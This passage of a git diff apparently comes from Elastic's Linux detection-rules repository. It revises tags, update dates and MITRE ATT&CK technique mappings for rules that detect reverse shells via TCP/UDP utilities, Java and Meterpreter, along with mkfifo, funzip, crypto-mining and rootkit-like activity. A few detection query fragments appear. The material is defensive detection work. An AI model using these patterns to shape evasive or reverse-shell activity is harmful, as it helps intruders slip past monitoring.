"https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -122,16 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_java_revshell_linux.toml b/rules/linux/execution_shell_via_java_revshell_linux.toml index ca489d0cc11..45f7f7ec55b 100644 --- a/rules/linux/execution_shell_via_java_revshell_linux.toml +++ b/rules/linux/execution_shell_via_java_revshell_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -139,16 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml index 26b891475de..434c19d770b 100644 --- a/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml +++ b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -121,6 +114,19 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -131,20 +137,17 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml index 8e75039764d..3bdb54b7611 100644 --- a/rules/linux/execution_shell_via_meterpreter_linux.toml +++ b/rules/linux/execution_shell_via_meterpreter_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -61,14 +61,7 @@ However, if more advanced configuration is required to detect specific behavior, -w /etc/passwd -p wa -k passwd """ severity = "high" -tags = [ - "Data Source: Auditd Manager", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Discovery", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -118,29 +111,26 @@ Meterpreter is a sophisticated payload within the Metasploit framework, enabling framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1087/001/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml index ed5b8943ef7..356cfbbcded 100644 --- a/rules/linux/execution_shell_via_suspicious_binary.toml +++ b/rules/linux/execution_shell_via_suspicious_binary.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -116,6 +109,19 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -130,16 +136,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml index c8be644cd99..3623af76665 100644 --- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,14 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -106,6 +99,19 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -120,16 +126,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml index 35f575a8b8e..80a1c2d1c61 100644 --- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -95,14 +95,7 @@ However, if more advanced configuration is required to detect specific behavior, - For this detection rule no additional audit rules are required to be added to the integration. """ severity = "medium" -tags = [ - "Data Source: Auditd Manager", - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -127,6 +120,19 @@ sample by host.id, process.pid, process.parent.pid [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -141,16 +147,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml index 19461e6ab6b..c5e14b5e1f1 100644 --- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml +++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,29 +99,16 @@ not (process.parent.name in ("sh", "sudo") and ?process.parent.command_line : "* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml index 880ff976e63..9dde89eea91 100644 --- a/rules/linux/execution_suspicious_executable_running_system_commands.toml +++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -121,20 +113,39 @@ process.parent.executable:( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml index 30a5f83b43b..d66c1399690 100644 --- a/rules/linux/execution_suspicious_mining_process_creation_events.toml +++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/08" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,17 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -107,16 +97,29 @@ file where host.os.type == "linux" and event.type == "creation" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1496" +name = "Resource Hijacking" +reference = "https://attack.mitre.org/techniques/T1496/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/execution_suspicious_mkfifo_execution.toml b/rules/linux/execution_suspicious_mkfifo_execution.toml index 2db8e46b29d..1d324c1339f 100644 --- a/rules/linux/execution_suspicious_mkfifo_execution.toml +++ b/rules/linux/execution_suspicious_mkfifo_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,17 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -106,11 +96,6 @@ process.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not (/*fifo* or /var/tmp/ [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -121,19 +106,15 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml index a35ae4ec714..7fcc1c718a0 100644 --- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml +++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,21 +58,7 @@ This rule flags pods or containers started via orchestration or runtime tools th risk_score = 47 rule_id = "c595363f-52a6-49e1-9257-0e08ae043dbd" severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,17 +103,9 @@ reference = "https://attack.mitre.org/tactics/TA0002/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1053" diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml index c9804ea2744..a9a9dab2bc1 100644 --- a/rules/linux/execution_system_binary_file_permission_change.toml +++ b/rules/linux/execution_system_binary_file_permission_change.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,11 +110,16 @@ process.args in ("4755", "755", "000", "777", "444", "+x") and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml index 52cc47e2b35..ea6f456d2d8 100644 --- a/rules/linux/execution_tc_bpf_filter.toml +++ b/rules/linux/execution_tc_bpf_filter.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,19 +90,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Threat: TripleCross", - "Data Source: Auditd Manager", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: TripleCross", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -116,16 +104,16 @@ not ?process.parent.executable == "/usr/sbin/libvirtd" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1562.004" +name = "Disable or Modify System Firewall" +reference = "https://attack.mitre.org/techniques/T1562/004/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml index 6c81fd12cc5..a12234501a0 100644 --- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml +++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,20 +100,14 @@ event.category:process and host.os.type:linux and auditd.data.syscall:mprotect a framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml index fb453b1a848..10ee7be4397 100644 --- a/rules/linux/execution_unusual_kthreadd_execution.toml +++ b/rules/linux/execution_unusual_kthreadd_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,15 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -117,21 +109,33 @@ process.command_line:( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = 